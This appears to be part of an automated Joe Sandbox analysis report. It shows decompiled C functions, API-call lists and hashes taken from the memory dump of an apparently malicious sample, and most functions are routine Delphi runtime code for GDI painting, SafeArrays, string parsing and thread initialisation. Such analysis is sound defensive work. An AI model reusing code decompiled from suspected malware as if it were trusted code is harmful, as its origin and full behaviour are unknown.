                                                    Uniqueness Score: -1.00%

                                                    Function 00454268 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E00454268(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x454436);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0043AAC0(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						L004398B8( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E0043F3B8(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x454444);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E00425610( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E00425610( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E004541DC(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E00454704(_v8) == 0 || E00454228(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E0045152C( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E004541DC(_t150);
							} else {
								E004541DC(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























                                                    0x00454268
                                                    0x00454268
                                                    0x00454268
                                                    0x00454268
                                                    0x00454269
                                                    0x0045426b
                                                    0x0045426e
                                                    0x00454271
                                                    0x00454279
                                                    0x0045427c
                                                    0x0045438c
                                                    0x00454393
                                                    0x004543ab
                                                    0x004543ab
                                                    0x004543b0
                                                    0x004543b1
                                                    0x004543b6
                                                    0x004543b9
                                                    0x004543c0
                                                    0x004543d0
                                                    0x004543de
                                                    0x004543e6
                                                    0x004543ec
                                                    0x004543ff
                                                    0x004543ff
                                                    0x0045440a
                                                    0x00454411
                                                    0x00454414
                                                    0x00454417
                                                    0x00454420
                                                    0x00000000
                                                    0x00454430
                                                    0x00454435
                                                    0x00454282
                                                    0x00454282
                                                    0x00454285
                                                    0x004542c5
                                                    0x004542d3
                                                    0x004542e1
                                                    0x004542f0
                                                    0x0045430c
                                                    0x0045432b
                                                    0x0045432b
                                                    0x00454330
                                                    0x00454333
                                                    0x00454287
                                                    0x00454287
                                                    0x0045428a
                                                    0x00454340
                                                    0x00454346
                                                    0x00454350
                                                    0x00454360
                                                    0x00454371
                                                    0x0045436d
                                                    0x0045436d
                                                    0x0045436d
                                                    0x0045437c
                                                    0x0045437c
                                                    0x00454290
                                                    0x00454293
                                                    0x0045443e
                                                    0x00454299
                                                    0x0045429a
                                                    0x004542a0
                                                    0x004542a7
                                                    0x004542ad
                                                    0x004542b0
                                                    0x004542b0
                                                    0x004542a7
                                                    0x00454293
                                                    0x0045428a
                                                    0x00454447
                                                    0x00454447

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                    • String ID:
                                                    • API String ID: 901200654-0
                                                    • Opcode ID: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                    • Instruction ID: 131b90634cb33abbaab8d9433d3d521d828b3d7b247f4d7e968007ff8c91c40e
                                                    • Opcode Fuzzy Hash: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                    • Instruction Fuzzy Hash: 4651F075E04108EFCB00DB99C549E9DB7F8AB49319F5485A6E808EB352D738AE85DB08
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00410B94 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040F328();
					return E00410638(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040F784();
						_t113 = _t54;
						if(_t113 == 0) {
							E00410390(_t100);
						}
						E004109E8(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E00410B08(_v788 - 1, _t115) != 0) {
								L0040F79C();
								E00410638(_v792);
								L0040F79C();
								E00410638( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E00410B38(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F78C();
							E00410638(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F794();
							E00410638(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                                    0x00410b94
                                                    0x00410ba0
                                                    0x00410ba6
                                                    0x00410ba8
                                                    0x00410bb2
                                                    0x00410bb9
                                                    0x00410bb9
                                                    0x00410bbe
                                                    0x00410bcc
                                                    0x00410d45
                                                    0x00410d4c
                                                    0x00410d4d
                                                    0x00000000
                                                    0x00410bd2
                                                    0x00410bd5
                                                    0x00410be7
                                                    0x00410bd7
                                                    0x00410bdc
                                                    0x00410bdc
                                                    0x00410bf6
                                                    0x00410c02
                                                    0x00410c05
                                                    0x00410c72
                                                    0x00410c78
                                                    0x00410c79
                                                    0x00410c7f
                                                    0x00410c80
                                                    0x00410c82
                                                    0x00410c87
                                                    0x00410c8b
                                                    0x00410c8d
                                                    0x00410c8d
                                                    0x00410c98
                                                    0x00410ca3
                                                    0x00410cae
                                                    0x00410cb7
                                                    0x00410cba
                                                    0x00410cd6
                                                    0x00410cdd
                                                    0x00410ce8
                                                    0x00410cff
                                                    0x00410d04
                                                    0x00410d18
                                                    0x00410d1d
                                                    0x00410d30
                                                    0x00410d30
                                                    0x00410d39
                                                    0x00410cbc
                                                    0x00410cbc
                                                    0x00410cbd
                                                    0x00410cc3
                                                    0x00410cc9
                                                    0x00410ccb
                                                    0x00410ccd
                                                    0x00410cd0
                                                    0x00410cd3
                                                    0x00410cd3
                                                    0x00410cd6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00410cd6
                                                    0x00410c07
                                                    0x00410c07
                                                    0x00410c08
                                                    0x00410c0a
                                                    0x00410c10
                                                    0x00410c12
                                                    0x00410c21
                                                    0x00410c22
                                                    0x00410c2c
                                                    0x00410c2d
                                                    0x00410c32
                                                    0x00410c3d
                                                    0x00410c3e
                                                    0x00410c48
                                                    0x00410c49
                                                    0x00410c4e
                                                    0x00410c69
                                                    0x00410c6b
                                                    0x00410c6c
                                                    0x00410c6f
                                                    0x00410c6f
                                                    0x00000000
                                                    0x00410c10
                                                    0x00410c05

                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                    • String ID:
                                                    • API String ID: 351091851-0
                                                    • Opcode ID: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                    • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                    • Opcode Fuzzy Hash: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                    • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041CE2C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				void* _t36;
				void* _t49;
				CHAR* _t50;
				void* _t60;
				void* _t71;
				char _t72;
				char _t73;
				intOrPtr _t88;
				CHAR* _t91;
				CHAR** _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;

				_t96 = _t97;
				_t98 = _t97 + 0xfffffff4;
				_v16 = 0;
				_t71 = __edx;
				_v8 = __eax;
				_t94 =  &_v12;
				 *[fs:eax] = _t98;
				L0041BEF0(_v8);
				 *[fs:eax] = _t98;
				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
				 *_t94 = E00404E80(_t71);
				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
					 *_t94 = CharNextA( *_t94);
				}
				while(1) {
					_t72 =  *( *_t94);
					if(_t72 == 0) {
						break;
					}
					_t36 = E0041CFA4(_v8);
					__eflags = _t72 - _t36;
					if(_t72 != _t36) {
						_t91 =  *_t94;
						while(1) {
							_t73 =  *( *_t94);
							__eflags = _t73 - 0x20;
							if(_t73 <= 0x20) {
								break;
							}
							_t60 = E0041CF8C(_v8);
							__eflags = _t73 - _t60;
							if(_t73 != _t60) {
								 *_t94 = CharNextA( *_t94);
								continue;
							}
							break;
						}
						__eflags =  *_t94 - _t91;
						E00404AB0( &_v16,  *_t94 - _t91, _t91,  *_t94 - _t91);
					} else {
						E004091D4(_t94,  &_v16, E0041CFA4(_v8));
					}
					 *((intOrPtr*)( *_v8 + 0x38))();
					while(1) {
						__eflags =  *( *_t94) - 0xffffffffffffffe1;
						if( *( *_t94) - 0xffffffffffffffe1 >= 0) {
							break;
						}
						 *_t94 = CharNextA( *_t94);
					}
					_t49 = E0041CF8C(_v8);
					__eflags = _t49 -  *( *_t94);
					if(_t49 ==  *( *_t94)) {
						_t50 = CharNextA( *_t94);
						__eflags =  *_t50;
						if( *_t50 == 0) {
							__eflags = 0;
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
						do {
							 *_t94 = CharNextA( *_t94);
							__eflags =  *( *_t94) - 0xffffffffffffffe1;
						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
					}
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E0041CF65);
				return L0041BFAC(_v8);
			}




















                                                    0x0041ce2d
                                                    0x0041ce2f
                                                    0x0041ce37
                                                    0x0041ce3a
                                                    0x0041ce3c
                                                    0x0041ce3f
                                                    0x0041ce4d
                                                    0x0041ce53
                                                    0x0041ce63
                                                    0x0041ce6b
                                                    0x0041ce75
                                                    0x0041ce83
                                                    0x0041ce81
                                                    0x0041ce81
                                                    0x0041cf3c
                                                    0x0041cf3e
                                                    0x0041cf42
                                                    0x00000000
                                                    0x00000000
                                                    0x0041ce94
                                                    0x0041ce99
                                                    0x0041ce9b
                                                    0x0041ceb3
                                                    0x0041cec1
                                                    0x0041cec3
                                                    0x0041cec5
                                                    0x0041cec8
                                                    0x00000000
                                                    0x00000000
                                                    0x0041cecd
                                                    0x0041ced2
                                                    0x0041ced4
                                                    0x0041cebf
                                                    0x00000000
                                                    0x0041cebf
                                                    0x00000000
                                                    0x0041ced4
                                                    0x0041ced8
                                                    0x0041cedf
                                                    0x0041ce9d
                                                    0x0041ceac
                                                    0x0041ceac
                                                    0x0041ceec
                                                    0x0041cefb
                                                    0x0041cf00
                                                    0x0041cf02
                                                    0x00000000
                                                    0x00000000
                                                    0x0041cef9
                                                    0x0041cef9
                                                    0x0041cf07
                                                    0x0041cf0e
                                                    0x0041cf10
                                                    0x0041cf15
                                                    0x0041cf1a
                                                    0x0041cf1d
                                                    0x0041cf1f
                                                    0x0041cf26
                                                    0x0041cf26
                                                    0x0041cf29
                                                    0x0041cf31
                                                    0x0041cf38
                                                    0x0041cf38
                                                    0x0041cf29
                                                    0x0041cf10
                                                    0x0041cf4a
                                                    0x0041cf4d
                                                    0x0041cf50
                                                    0x0041cf5d

                                                    APIs
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CE7C
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CEF4
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CF15
                                                    • CharNextA.USER32(00000000,?,?,00000000,0041CF7B), ref: 0041CF2C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID:
                                                    • API String ID: 3213498283-3916222277
                                                    • Opcode ID: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                    • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                    • Opcode Fuzzy Hash: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                    • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426AA0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 81%
                                                    			E00426AA0(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				struct HDC__* _v44;
				signed int* _t36;
				signed int _t39;
				signed int _t42;
				signed int* _t52;
				signed int _t56;
				intOrPtr _t66;
				void* _t72;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t52 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408D24(_v24, __eflags);
				 *[fs:edx] = _t75;
				_t56 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x426d97, _t73, __edi, __esi, __ebx, _t72);
				if(( *_t52 | _t52[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t52;
					_t36[1] = _t52[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_a4[1] = GetSystemMetrics(0xc);
				}
				_v44 = GetDC(0);
				if(_v44 == 0) {
					L00425F64(_t56);
				}
				_push(_t73);
				_push(0x426b89);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				_t39 = GetDeviceCaps(_v44, 0xe);
				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
				if(_t42 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t42;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(0x426b90);
				return ReleaseDC(0, _v44);
			}




















                                                    0x00426aa1
                                                    0x00426aa3
                                                    0x00426aa9
                                                    0x00426aac
                                                    0x00426aaf
                                                    0x00426ab2
                                                    0x00426abb
                                                    0x00426ac6
                                                    0x00426ad4
                                                    0x00426ada
                                                    0x00426ae2
                                                    0x00426aea
                                                    0x00426b07
                                                    0x00426b0c
                                                    0x00426b11
                                                    0x00426aec
                                                    0x00426af6
                                                    0x00426b02
                                                    0x00426b02
                                                    0x00426b1b
                                                    0x00426b22
                                                    0x00426b24
                                                    0x00426b24
                                                    0x00426b2b
                                                    0x00426b2c
                                                    0x00426b31
                                                    0x00426b34
                                                    0x00426b3d
                                                    0x00426b53
                                                    0x00426b59
                                                    0x00426b6b
                                                    0x00426b6d
                                                    0x00426b5b
                                                    0x00426b5b
                                                    0x00426b5b
                                                    0x00426b72
                                                    0x00426b75
                                                    0x00426b78
                                                    0x00426b88

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 00426AEE
                                                    • GetSystemMetrics.USER32 ref: 00426AFA
                                                    • GetDC.USER32(00000000), ref: 00426B16
                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00426B3D
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00426B4A
                                                    • ReleaseDC.USER32 ref: 00426B83
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDeviceMetricsSystem$Release
                                                    • String ID:
                                                    • API String ID: 447804332-0
                                                    • Opcode ID: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                    • Instruction ID: 72199b77af9d5ad6b2438074c355ca19ed48f1e35d4323483afc0bacfeaa441d
                                                    • Opcode Fuzzy Hash: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                    • Instruction Fuzzy Hash: 90316F74E00214AFEB00EF65C841AAEBBF5FB49750F51856AE814AB394C638A941CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426F10 Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E00426F10(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HPALETTE__* _v12;
				struct HDC__* _v16;
				struct tagBITMAPINFO* _t36;
				intOrPtr _t43;
				struct HBITMAP__* _t47;
				void* _t50;

				_t36 = __ecx;
				_t47 = __eax;
				E00426DC0(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = CreateCompatibleDC(0);
				_push(_t50);
				_push(0x426fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if(__edx != 0) {
					_v12 = SelectPalette(_v16, __edx, 0);
					RealizePalette(_v16);
				}
				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(0x426fb4);
				if(_v12 != 0) {
					SelectPalette(_v16, _v12, 0);
				}
				return DeleteDC(_v16);
			}










                                                    0x00426f19
                                                    0x00426f1d
                                                    0x00426f26
                                                    0x00426f2d
                                                    0x00426f37
                                                    0x00426f3c
                                                    0x00426f3d
                                                    0x00426f42
                                                    0x00426f45
                                                    0x00426f4a
                                                    0x00426f58
                                                    0x00426f5f
                                                    0x00426f5f
                                                    0x00426f7d
                                                    0x00426f83
                                                    0x00426f86
                                                    0x00426f89
                                                    0x00426f92
                                                    0x00426f9e
                                                    0x00426f9e
                                                    0x00426fac

                                                    APIs
                                                      • Part of subcall function 00426DC0: GetObjectA.GDI32(?,00000054), ref: 00426DD4
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00426F32
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 00426F53
                                                    • RealizePalette.GDI32(?), ref: 00426F5F
                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00426F76
                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 00426F9E
                                                    • DeleteDC.GDI32(?), ref: 00426FA7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                    • String ID:
                                                    • API String ID: 1221726059-0
                                                    • Opcode ID: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                    • Instruction ID: 77de815d1256251625e09d43045054b0a879545964fd81c4b279a3d00da1559d
                                                    • Opcode Fuzzy Hash: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                    • Instruction Fuzzy Hash: C2114F75F082047FDB10DBA9DC41F9EBBECEB48714F5284AAB914E7281D678A900C769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426750 Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00426750(void* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				void* _t20;
				struct HDC__* _t25;
				void* _t28;
				void* _t31;
				struct HPALETTE__* _t33;
				LOGPALETTE* _t34;

				_t31 = __eax;
				_t33 = 0;
				_t34->palVersion = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004029DC(_t28, __ecx << 2,  &_v1036);
				} else {
					_t25 = CreateCompatibleDC(0);
					_t20 = SelectObject(_t25, _t31);
					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
					SelectObject(_t25, _t20);
					DeleteDC(_t25);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E004266B8(_t34) == 0) {
						E00426548( &_v1036, _v1038 & 0x0000ffff);
					}
					_t33 = CreatePalette(_t34);
				}
				return _t33;
			}













                                                    0x00426759
                                                    0x0042675b
                                                    0x0042675d
                                                    0x00426765
                                                    0x0042679f
                                                    0x004267ad
                                                    0x00426767
                                                    0x0042676e
                                                    0x00426772
                                                    0x0042678b
                                                    0x00426792
                                                    0x00426798
                                                    0x00426798
                                                    0x004267b8
                                                    0x004267c0
                                                    0x004267d6
                                                    0x004267d6
                                                    0x004267e3
                                                    0x004267e3
                                                    0x004267f0

                                                    APIs
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00426769
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00426772
                                                    • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3), ref: 00426786
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00426792
                                                    • DeleteDC.GDI32(00000000), ref: 00426798
                                                    • CreatePalette.GDI32 ref: 004267DE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                    • String ID:
                                                    • API String ID: 2515223848-0
                                                    • Opcode ID: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                    • Instruction ID: efc5091b96ee346cfcb1bb7471c8c7bb22fdf2c070b44c7d61a8e62d02ab9fa2
                                                    • Opcode Fuzzy Hash: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                    • Instruction Fuzzy Hash: 8701847160832061E2246766AC43A6B72AC9FC0758F41882FB988A72C1E67C9845D3AB
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406B91 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				_t2 = __eax - 0x49e5bc;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
				 *0x49b00c = 2;
				 *0x49e014 = 0x40124c;
				 *0x49e018 = 0x40125c;
				 *0x49e04e = 2;
				 *0x49e000 = 0x405998;
				if(L00403A2C(_t2) != 0) {
					_t3 = L00403A5C();
				}
				L00403B20(_t3);
				 *0x49e054 = 0xd7b0;
				 *0x49e220 = 0xd7b0;
				 *0x49e3ec = 0xd7b0;
				 *0x49e040 = GetCommandLineA();
				 *0x49e03c = E004013AC();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x49e5c0 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x49e034 = _t11;
				return _t11;
			}





                                                    0x00406b91
                                                    0x00406b91
                                                    0x00406b96
                                                    0x00406b9b
                                                    0x00406b9d
                                                    0x00406ba4
                                                    0x00406bae
                                                    0x00406bb8
                                                    0x00406bbf
                                                    0x00406bd0
                                                    0x00406bd2
                                                    0x00406bd2
                                                    0x00406bd7
                                                    0x00406bdc
                                                    0x00406be5
                                                    0x00406bee
                                                    0x00406bfc
                                                    0x00406c06
                                                    0x00406c1a
                                                    0x00406c53
                                                    0x00406c1c
                                                    0x00406c2a
                                                    0x00406c42
                                                    0x00406c2c
                                                    0x00406c2c
                                                    0x00406c2c
                                                    0x00406c2a
                                                    0x00406c58
                                                    0x00406c5d
                                                    0x00406c62

                                                    APIs
